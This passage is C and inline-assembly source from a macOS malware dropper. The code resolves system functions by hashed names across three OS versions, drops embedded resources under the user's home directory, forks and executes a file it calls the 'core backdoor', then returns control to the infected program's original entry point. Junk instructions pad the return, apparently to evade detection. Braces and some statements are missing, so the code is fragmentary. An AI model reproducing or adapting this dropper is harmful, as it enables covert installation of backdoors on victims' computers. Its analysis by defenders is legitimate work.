        "subl $0xD2, %%eax\n"
        "movl %%eax, %0\n"
        : "=m"(baseAddress)

    int pid = 0;

    char *userHome                  = NULL;
    char *destinationDir            = NULL;
    char *filePointer               = NULL;
    char *backdoorPath              = NULL;
    int backdoorIsAlreadyInstalled  = 0;
    int errorOnInstall              = 0;

    unsigned int offset         = (unsigned int)(infectionBase) + sizeof (infectionHeader);
    infectionHeader *infection  = (infectionHeader *)infectionBase;
    stringTable *stringList     = (stringTable *)offset;
    resourceHeader *resource    = NULL;
    char *strings[16];

    // dyld function pointer prototypes
    uint32_t (*_idyld_image_count)                        (void);
    const char *(*_idyld_get_image_name)                  (uint32_t);
    const struct mach_header *(*_idyld_get_image_header)  (uint32_t);

    // libSystem function pointer prototypes
    int   (*iopen)            (const char *, int, ...);
    long  (*ilseek)            (int, _mOff_t, int);
    int   (*iclose)            (int);
    int   (*ichdir)            (const char *);
    int   (*iwrite)            (int, const void *, int);
    int   (*ipwrite)        (int, const void *, int, _mOff_t);
    int   (*istat)            (const char *, struct stat *);
    void *(*immap)            (void *, _mSize_t, int, int, int, _mOff_t);
    int   (*imunmap)        (void *, _mSize_t);
    void *(*imemcpy)        (void *, const void *, int);
    int   (*isprintf)        (char *, const char *, ...);
    int   (*iprintf)        (const char *, ...);
    char *(*igetenv)        (const char *);
    int   (*imkdir)            (const char *, unsigned int);
    int   (*iexecve)        (const char *, char *, char *);
    int   (*iexecl)            (const char *, const char *, ...);
    int   (*ifork)            (void);
    char *(*istrncpy)        (char *, const char *, _mSize_t);
    void *(*imalloc)        (int);
    void  (*ifree)            (void *);
    unsigned int (*isleep)    (unsigned int);
    int (*isigaction)        (int sig, sigaction *act, sigaction *oact);

    void *libdyldAddress    = mapLibDyld();
    void *libsystemcAddress = mapLibSystemC();
    void *libsystemkAddress = mapLibSystemK();

    unsigned int imageBase  = (unsigned int)dyldBaseAddress;

    if (osx_version == 1)
        _idyld_image_count = (uint32_t (__cdecl*)(void))(findSymbol_snow((byte *)imageBase, dyld_image_countHash));
    else if (osx_version == 2)
        _idyld_image_count = (uint32_t (__cdecl*)(void))(findSymbol_lion((byte *)imageBase, dyld_image_countHash));
    else if (osx_version == 3)
        _idyld_image_count = (uint32_t (__cdecl*)(void))(findSymbol_mavericks((byte *)imageBase, dyld_image_countHash));

    if ((int)_idyld_image_count != -1)
        imageCount = _idyld_image_count ();

        printf ("[ii] imageCount: %d\n", imageCount);
        if (osx_version == 1)
            _idyld_get_image_name = (const char *(__cdecl *)(uint32_t))
                (findSymbol_snow((byte *)imageBase, dyld_get_image_nameHash));
            _idyld_get_image_header = (const mach_header *(__cdecl *)(uint32_t))
                (findSymbol_snow((byte *)imageBase, dyld_get_image_headerHash));
        else if (osx_version == 2)
            _idyld_get_image_name = (const char *(__cdecl *)(uint32_t))
                (findSymbol_lion((byte *)imageBase, dyld_get_image_nameHash));
            _idyld_get_image_header = (const mach_header *(__cdecl *)(uint32_t))
                (findSymbol_lion((byte *)imageBase, dyld_get_image_headerHash));
        else if (osx_version == 3)
            _idyld_get_image_name = (const char *(__cdecl *)(uint32_t))
                (findSymbol_mavericks((byte *)imageBase, dyld_get_image_nameHash));
            _idyld_get_image_header = (const mach_header *(__cdecl *)(uint32_t))
                (findSymbol_mavericks((byte *)imageBase, dyld_get_image_headerHash));

        const struct mach_header *m_header = NULL;

        if ((int)_idyld_get_image_name != -1)
            if (osx_version == 1)
                // We are on Leopard / Snow Leopard
                for (z = 0; z < imageCount; z++)
                    imageName = _idyld_get_image_name (z);
                    m_header  = _idyld_get_image_header (z);
                    printf ("[ii] image: %s\n", imageName);
                    if (sdbm ((unsigned char *)imageName) == libSystemHash)
                        if ((int)_idyld_get_image_header != -1)
                            libSystemAddress = mapLibSystem();

                            if (libSystemAddress == NULL)

                            iopen     = (int   (__cdecl *)(const char *, int, ...))(findSymbolInFatBinary ((byte *)libSystemAddress, openHash) + (unsigned int)m_header);
                            ilseek    = (long  (__cdecl *)(int, _mOff_t, int))(findSymbolInFatBinary ((byte *)libSystemAddress, lseekHash) + (unsigned int)m_header);
                            iclose    = (int   (__cdecl *)(int))(findSymbolInFatBinary ((byte *)libSystemAddress, closeHash) + (unsigned int)m_header);
                            ichdir    = (int   (__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libSystemAddress, chdirHash) + (unsigned int)m_header);
                            iwrite    = (int   (__cdecl *)(int, const void *, int))(findSymbolInFatBinary ((byte *)libSystemAddress, writeHash) + (unsigned int)m_header);
                            ipwrite   = (int   (__cdecl *)(int, const void *, int, _mOff_t))(findSymbolInFatBinary ((byte *)libSystemAddress, pwriteHash) + (unsigned int)m_header);
                            istat     = (int   (__cdecl *)(const char *, struct stat *))(findSymbolInFatBinary ((byte *)libSystemAddress, statHash) + (unsigned int)m_header);
                            immap     = (void *(__cdecl *)(void *, _mSize_t, int, int, int, _mOff_t))(findSymbolInFatBinary ((byte *)libSystemAddress, mmapHash) + (unsigned int)m_header);
                            imunmap   = (int   (__cdecl *)(void *, _mSize_t))(findSymbolInFatBinary ((byte *)libSystemAddress, munmapHash) + (unsigned int)m_header);
                            imemcpy   = (void *(__cdecl *)(void *, const void *, int))(findSymbolInFatBinary ((byte *)libSystemAddress, memcpyHash) + (unsigned int)m_header);
                            isprintf  = (int   (__cdecl *)(char *, const char *, ...))(findSymbolInFatBinary ((byte *)libSystemAddress, sprintfHash) + (unsigned int)m_header);
                            iprintf   = (int   (__cdecl *)(const char *,...))(findSymbolInFatBinary ((byte *)libSystemAddress, printfHash) + (unsigned int)m_header);
                            igetenv   = (char *(__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libSystemAddress, getenvHash) + (unsigned int)m_header);
                            imkdir    = (int   (__cdecl *)(const char *, unsigned int))(findSymbolInFatBinary ((byte *)libSystemAddress, mkdirHash) + (unsigned int)m_header);
                            iexecve   = (int   (__cdecl *)(const char *, char *, char *))(findSymbolInFatBinary ((byte *)libSystemAddress, execveHash) + (unsigned int)m_header);
                            iexecl    = (int   (__cdecl *)(const char *, const char *,...))(findSymbolInFatBinary ((byte *)libSystemAddress, execlHash) + (unsigned int)m_header);
                            ifork     = (int   (__cdecl *)(void))(findSymbolInFatBinary ((byte *)libSystemAddress, forkHash) + (unsigned int)m_header);
                            istrncpy  = (char *(__cdecl *)(char *, const char *, _mSize_t))(findSymbolInFatBinary ((byte *)libSystemAddress, strncpyHash) + (unsigned int)m_header);
                            imalloc   = (void *(__cdecl *)(int))(findSymbolInFatBinary ((byte *)libSystemAddress, mallocHash) + (unsigned int)m_header);
                            ifree     = (void  (__cdecl *)(void *))(findSymbolInFatBinary ((byte *)libSystemAddress, freeHash) + (unsigned int)m_header);
                            isleep    = (unsigned int (__cdecl *)(unsigned int))(findSymbolInFatBinary ((byte *)libSystemAddress, sleepHash) + (unsigned int)m_header);
                            isigaction = (int (__cdecl *)(int, sigaction *, sigaction *))(findSymbolInFatBinary ((byte *)libSystemAddress, sigactionHash) + (unsigned int)m_header);

            else if (osx_version == 2)
                // We are on Lion
                for (z = 0; z < imageCount; z++)
                    imageName = _idyld_get_image_name(z);
                    m_header  = _idyld_get_image_header(z);

                    printf ("[ii] image: %s\n", imageName);
                    unsigned int hash = sdbm((unsigned char *)imageName);
                    if (hash == libsystemkHash)
                        if (libsystemkAddress == NULL)
                            doExit(); // FIXME: OEP_CALL ?

                        iopen     = (int   (__cdecl *)(const char *, int, ...))(findSymbolInFatBinary ((byte *)libsystemkAddress, openHash) + (unsigned int)m_header);
                        ilseek    = (long  (__cdecl *)(int, _mOff_t, int))(findSymbolInFatBinary ((byte *)libsystemkAddress, lseekHash) + (unsigned int)m_header);
                        iclose    = (int   (__cdecl *)(int))(findSymbolInFatBinary ((byte *)libsystemkAddress, closeHash) + (unsigned int)m_header);
                        ichdir    = (int   (__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libsystemkAddress, chdirHash) + (unsigned int)m_header);
                        iwrite    = (int   (__cdecl *)(int, const void *, int))(findSymbolInFatBinary ((byte *)libsystemkAddress, writeHash) + (unsigned int)m_header);
                        ipwrite   = (int   (__cdecl *)(int, const void *, int, _mOff_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, pwriteHash) + (unsigned int)m_header);
                        istat     = (int   (__cdecl *)(const char *, struct stat *))(findSymbolInFatBinary ((byte *)libsystemkAddress, statHash) + (unsigned int)m_header);
                        immap     = (void *(__cdecl *)(void *, _mSize_t, int, int, int, _mOff_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, mmapHash) + (unsigned int)m_header);
                        imunmap   = (int   (__cdecl *)(void *, _mSize_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, munmapHash) + (unsigned int)m_header);
                        imkdir    = (int   (__cdecl *)(const char *, unsigned int))(findSymbolInFatBinary ((byte *)libsystemkAddress, mkdirHash) + (unsigned int)m_header);
                        iexecve   = (int   (__cdecl *)(const char *, char *, char *))(findSymbolInFatBinary ((byte *)libsystemkAddress, execveHash) + (unsigned int)m_header);
                    else if (hash == libsystemcHash)
                        if (libsystemcAddress == NULL)
                            doExit(); // OEP_CALL?? FIXME

                        imemcpy   = (void *(__cdecl *)(void *, const void *, int))(findSymbolInFatBinary ((byte *)libsystemcAddress, memcpyHash) + (unsigned int)m_header);
                        isprintf  = (int   (__cdecl *)(char *, const char *, ...))(findSymbolInFatBinary ((byte *)libsystemcAddress, sprintfHash) + (unsigned int)m_header);
                        iprintf   = (int   (__cdecl *)(const char *,...))(findSymbolInFatBinary ((byte *)libsystemcAddress, printfHash) + (unsigned int)m_header);
                        igetenv   = (char *(__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libsystemcAddress, getenvHash) + (unsigned int)m_header);
                        iexecl    = (int   (__cdecl *)(const char *, const char *,...))(findSymbolInFatBinary ((byte *)libsystemcAddress, execlHash) + (unsigned int)m_header);
                        ifork     = (int   (__cdecl *)(void))(findSymbolInFatBinary ((byte *)libsystemcAddress, forkHash) + (unsigned int)m_header);
                        istrncpy  = (char *(__cdecl *)(char *, const char *, _mSize_t))(findSymbolInFatBinary ((byte *)libsystemcAddress, strncpyHash) + (unsigned int)m_header);
                        imalloc   = (void *(__cdecl *)(int))(findSymbolInFatBinary ((byte *)libsystemcAddress, mallocHash) + (unsigned int)m_header);
                        ifree     = (void  (__cdecl *)(void *))(findSymbolInFatBinary ((byte *)libsystemcAddress, freeHash) + (unsigned int)m_header);
                        isleep    = (unsigned int (__cdecl *)(unsigned int))(findSymbolInFatBinary ((byte *)libsystemcAddress, sleepHash) + (unsigned int)m_header);
                        isigaction = (int (__cdecl *)(int, sigaction *, sigaction *))(findSymbolInFatBinary ((byte *)libsystemcAddress, sigactionHash) + (unsigned int)m_header);
                for (z = 0; z < imageCount; z++)
                    imageName = _idyld_get_image_name(z);
                    m_header  = _idyld_get_image_header(z);
                    unsigned int hash = sdbm((unsigned char *)imageName);

                    if (hash == libsystemkHash)
                        if (libsystemkAddress == NULL)

                        iopen     = (int   (__cdecl *)(const char *, int, ...))(findSymbolInFatBinary ((byte *)libsystemkAddress, openHash) + (unsigned int)m_header);
                        ilseek    = (long  (__cdecl *)(int, _mOff_t, int))(findSymbolInFatBinary ((byte *)libsystemkAddress, lseekHash) + (unsigned int)m_header);
                        iclose    = (int   (__cdecl *)(int))(findSymbolInFatBinary ((byte *)libsystemkAddress, closeHash) + (unsigned int)m_header);
                        ichdir    = (int   (__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libsystemkAddress, chdirHash) + (unsigned int)m_header);
                        iwrite    = (int   (__cdecl *)(int, const void *, int))(findSymbolInFatBinary ((byte *)libsystemkAddress, writeHash) + (unsigned int)m_header);
                        ipwrite   = (int   (__cdecl *)(int, const void *, int, _mOff_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, pwriteHash) + (unsigned int)m_header);
                        istat     = (int   (__cdecl *)(const char *, struct stat *))(findSymbolInFatBinary ((byte *)libsystemkAddress, statHash) + (unsigned int)m_header);
                        immap     = (void *(__cdecl *)(void *, _mSize_t, int, int, int, _mOff_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, mmapHash) + (unsigned int)m_header);
                        imunmap   = (int   (__cdecl *)(void *, _mSize_t))(findSymbolInFatBinary ((byte *)libsystemkAddress, munmapHash) + (unsigned int)m_header);
                        imkdir    = (int   (__cdecl *)(const char *, unsigned int))(findSymbolInFatBinary ((byte *)libsystemkAddress, mkdirHash) + (unsigned int)m_header);
                        iexecve   = (int   (__cdecl *)(const char *, char *, char *))(findSymbolInFatBinary ((byte *)libsystemkAddress, execveHash) + (unsigned int)m_header);

                        imemcpy   = (void *(__cdecl *)(void *, const void *, int))(findSymbolInFatBinary ((byte *)libsystemkAddress, memcpyHash) + (unsigned int)m_header);
                        imalloc   = (void *(__cdecl *)(int))(findSymbolInFatBinary ((byte *)libsystemkAddress, mallocHash) + (unsigned int)m_header);
                        ifree     = (void  (__cdecl *)(void *))(findSymbolInFatBinary ((byte *)libsystemkAddress, freeHash) + (unsigned int)m_header);
                    else if (hash == libsystemcHash)
                        if (libsystemcAddress == NULL)

                        isprintf  = (int   (__cdecl *)(char *, const char *, ...))(findSymbolInFatBinary ((byte *)libsystemcAddress, sprintfHash) + (unsigned int)m_header);
                        iprintf   = (int   (__cdecl *)(const char *,...))(findSymbolInFatBinary ((byte *)libsystemcAddress, printfHash) + (unsigned int)m_header);
                        igetenv   = (char *(__cdecl *)(const char *))(findSymbolInFatBinary ((byte *)libsystemcAddress, getenvHash) + (unsigned int)m_header);
                        iexecl    = (int   (__cdecl *)(const char *, const char *,...))(findSymbolInFatBinary ((byte *)libsystemcAddress, execlHash) + (unsigned int)m_header);
                        ifork     = (int   (__cdecl *)(void))(findSymbolInFatBinary ((byte *)libsystemcAddress, forkHash) + (unsigned int)m_header);
                        istrncpy  = (char *(__cdecl *)(char *, const char *, _mSize_t))(findSymbolInFatBinary ((byte *)libsystemcAddress, strncpyHash) + (unsigned int)m_header);
                        isleep    = (unsigned int (__cdecl *)(unsigned int))(findSymbolInFatBinary ((byte *)libsystemcAddress, sleepHash) + (unsigned int)m_header);
                        isigaction = (int (__cdecl *)(int, sigaction *, sigaction *))(findSymbolInFatBinary ((byte *)libsystemcAddress, sigactionHash) + (unsigned int)m_header);


            // first restore signal handler
            new_act.sig_action = 0; // SIG_DFL
            isigaction(0xb, &new_act, &old_act); // 0xb == SIGSEGV

            for (i = 0; i < infection->numberOfStrings; i++)    
                strings[i] = stringList->value;
                offset += sizeof (stringTable);
                stringList = (stringTable *)offset;

            void *envVariableName = (char *)strings[0];
            if (igetenv != 0)
                userHome = (char *) igetenv ((const char *)envVariableName);
                errorOnInstall = 1; // FIXME: doExit() or goto EOPCALL

            char *backdoorDropPath = (char *)imalloc(128);
            char *cin = strings[5];
            char *qua = strings[4];
            char *un = strings[1];
            if (osx_version == 3)
                    push 1 /* fuck SIMD :|, su mavericks la sprintf fa uso di istruzioni SSE che richiedono stack allineato a 16 byte*/
                    push 1 /* fuck SIMD :| quindi nel caso crashase sulla sprintf misteriosamente si puo' aggiungere o togliere uno o piu' push push */
                    push 1 /* fuck SIMD :| */
                    push cin
                    push qua
                    push userHome
                    push un
                    push backdoorDropPath
                    call isprintf
                isprintf(backdoorDropPath, strings[1], userHome, strings[4], strings[5]);

            backdoorPath = (char *)imalloc (256);
            char *backdoorDir = NULL;

            offset = (unsigned int)infectionBase
                + sizeof (infectionHeader)
                + sizeof (stringTable) * infection->numberOfStrings
                + infection->dropperSize
                + crtStartSize + 1;

            // Cycle through and drop all the resources
            for (i = 0; i < infection->numberOfResources; i++)
                char *destinationPath = (char *) imalloc (256);
                destinationDir = (char *) imalloc (128);

                resource = (resourceHeader *)offset;
                isprintf (destinationDir, strings[2], backdoorDropPath, resource->path);

                if (backdoorDir == NULL)
                    backdoorDir = (char *)imalloc (256);
                    isprintf (backdoorDir, strings[2], backdoorDropPath, resource->path);

                imkdir (destinationDir, 0755);
                isprintf (destinationPath, strings[2], destinationDir, resource->name);

                if (resource->type == RESOURCE_CORE)
                    if (osx_version == 3)
                            push 1 // questa push e' per allineare lo stack a 16 byte come sopra (per mavericks)
                            push 256
                            push destinationPath
                            push backdoorPath
                            call istrncpy
                        istrncpy (backdoorPath, destinationPath, 256);

                    if ((fd = iopen (destinationPath, O_CREAT | O_EXCL, 0755)) == -1)
                        backdoorIsAlreadyInstalled = 1;

                int resSize = resource->size;
                offset += sizeof (resourceHeader);

                if ((fd = iopen (destinationPath, O_RDWR | O_CREAT | O_TRUNC, 0755)) >= 0)
                    if (iwrite (fd, (const void *)offset, resSize) == -1)
                        errorOnInstall = 1;

                    iclose (fd);

                offset += resSize;

                ifree (destinationDir);
                ifree (destinationPath);

            ifree (backdoorDropPath);

            // Execute the core backdoor file
            if (//backdoorIsAlreadyInstalled == 0
                errorOnInstall == 0)
                if ((pid = ifork()) == 0)
                    ichdir (backdoorDir);
                    iexecl (backdoorPath, backdoorPath, NULL, NULL, NULL);
                else if (pid > 0)
                    // jump to the original entry point
                    //doExit ();
                else if (pid < 0)
                    //doExit ();

            ifree (backdoorDir);
            ifree (backdoorPath);

#ifdef WIN32
            // Here we have to remove the fixed base (0x1000) and add
            // the randomized one     

            uint32_t baseAddress = (uint32_t)_idyld_get_image_header(0);
            uint32_t originalEP = infection->originalEP - 0x1000 + (uint32_t)baseAddress;

            // Restore register state and jump to the original entrypoint
            // ebp will be disarded by the crt initializer, so we can use it for the jump
            __asm__ __volatile__ {
                mov eax, _eax
                push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx

                mov ecx, _ecx
                mov edx, _edx
                push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx

                mov ebx, _ebx
                mov esi, _esi
                mov edi, _edi
                mov esp, _esp
                push eax
                pop eax
                mov eax, eax
                add eax, 0
                mov ebx, ebx
                push ecx
                mov ecx, ecx
                pop ecx

                mov ebp, originalEP; 

                mov eax, eax
                add eax, 0
                mov ebx, ebx

                add ebp, 0x30    // start right where we left, FIXME: what about EP different from crtStart??
                jmp ebp

            __asm__ __volatile__ (
                "movl  %0, %%eax\n"
                "movl  $0x1000, %%ebx\n"
                "movl  $0x5, %%ecx\n"

            __asm__ __volatile__ (
                "movl  %0, %%esp\n"
                "jmp   *%%eax\n"

void dropperEnd ()
    int b = 1;